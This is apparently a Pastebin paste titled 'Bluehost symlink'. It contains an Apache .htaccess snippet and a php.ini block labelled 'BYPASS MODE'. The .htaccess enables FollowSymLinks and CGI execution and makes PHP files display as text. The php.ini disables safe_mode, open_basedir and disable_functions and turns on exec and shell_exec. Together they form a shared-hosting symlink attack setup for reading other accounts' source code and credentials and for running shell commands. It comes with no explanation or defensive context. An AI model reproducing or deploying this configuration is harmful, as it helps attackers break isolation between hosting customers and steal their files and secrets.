cookjamesharold

Bluehost symlink

Jan 20th, 2019
48
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. #TIPE FILE
  2. <DIRECTORY /..../user/..../>
  3. OPTIONS Indexes ExecCGI FollowSymLinks
  4. AllowOverride All
  5. </DIRECTORY>
  6. AddType txt .php
  7. AddHandler txt .php
  8.  
  9.  
  10. "php.ini":
  11.  
  12. #BYPASS MODE
  13. safe_mode = OFF
  14. disable_functions = NONE
  15. safe_mode_gid = OFF
  16. open_basedir = OFF
  17. register_globals = ON
  18. exec = ON
  19. shell_exec = ON
Add Comment
Please, Sign In to add comment